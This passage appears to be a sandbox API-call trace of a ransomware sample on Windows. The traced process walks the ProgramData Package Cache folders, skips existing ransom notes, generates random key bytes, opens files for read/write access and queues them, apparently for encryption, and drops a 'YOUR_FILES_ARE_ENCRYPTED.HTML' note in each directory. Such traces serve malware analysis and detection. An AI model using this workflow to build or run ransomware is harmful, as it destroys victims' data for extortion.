lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1700, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0109.087] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388e9a80, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388e9a80, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1700, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0109.087] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.087] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0109.087] GetProcessHeap () returned 0x600000 [0109.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.087] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0109.087] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0109.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388e9a80, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388e9a80, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0109.088] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388e9a80, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388e9a80, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0109.088] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xfa960e00, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0109.088] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.088] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0109.088] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.088] lstrlenW (lpString=".cab") returned 4 [0109.088] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.088] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0109.093] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=5153816) returned 1 [0109.093] GetProcessHeap () returned 0x600000 [0109.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x681350 [0109.097] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="E5") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="B0") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="EC") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="82") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="93") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="62") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="A8") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="A7") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="92") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="9D") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="2E") returned 2 [0109.097] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="88") returned 2 [0109.097] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C1") returned 2 [0109.097] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="63") returned 2 [0109.097] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="B7") returned 2 [0109.097] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="9F") returned 2 [0109.097] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="C4") returned 2 [0109.097] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="E0") returned 2 [0109.097] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="F0") returned 2 [0109.097] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="E3") returned 2 [0109.097] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="F6") returned 2 [0109.097] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="63") returned 2 [0109.097] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="0F") returned 2 [0109.097] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="06") returned 2 [0109.097] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="E2") returned 2 [0109.097] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="DD") returned 2 [0109.097] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="2E") returned 2 [0109.097] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="F1") returned 2 [0109.097] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="6D") returned 2 [0109.097] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="67") returned 2 [0109.097] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="21") returned 2 [0109.097] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="46") returned 2 [0109.098] lstrcpyW (in: lpString1=0x691404, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0109.098] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x681350, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.098] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x681350, lpOverlapped=0x681350) returned 1 [0109.098] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0109.098] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.098] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0109.098] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0109.098] lstrlenW (lpString=".msi") returned 4 [0109.098] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0109.098] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0109.098] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0109.099] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0109.099] GetProcessHeap () returned 0x600000 [0109.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.099] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0109.103] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0109.103] CloseHandle (hObject=0x308) returned 1 [0109.104] GetProcessHeap () returned 0x600000 [0109.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.104] GetProcessHeap () returned 0x600000 [0109.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.104] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388e9a80, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388e9a80, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1700, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0109.104] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.105] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.105] GetProcessHeap () returned 0x600000 [0109.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.105] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0109.105] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0109.106] CloseHandle (hObject=0x30c) returned 1 [0109.107] GetProcessHeap () returned 0x600000 [0109.107] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.108] GetProcessHeap () returned 0x600000 [0109.108] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.108] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0109.108] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.108] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0109.108] GetProcessHeap () returned 0x600000 [0109.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.109] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.109] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.110] CloseHandle (hObject=0x314) returned 1 [0109.111] GetProcessHeap () returned 0x600000 [0109.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.111] GetProcessHeap () returned 0x600000 [0109.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.112] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0109.113] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.113] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0109.113] GetProcessHeap () returned 0x600000 [0109.113] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.114] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0109.114] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0109.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0109.114] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.114] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0109.114] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.114] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0109.114] GetProcessHeap () returned 0x600000 [0109.114] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.115] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0109.116] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0109.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1088, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0109.116] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1088, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0109.116] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388bfa11, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388bfa11, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1088, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0109.116] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.116] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0109.116] GetProcessHeap () returned 0x600000 [0109.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.117] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0109.117] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0109.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388bfa11, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388bfa11, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.117] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, 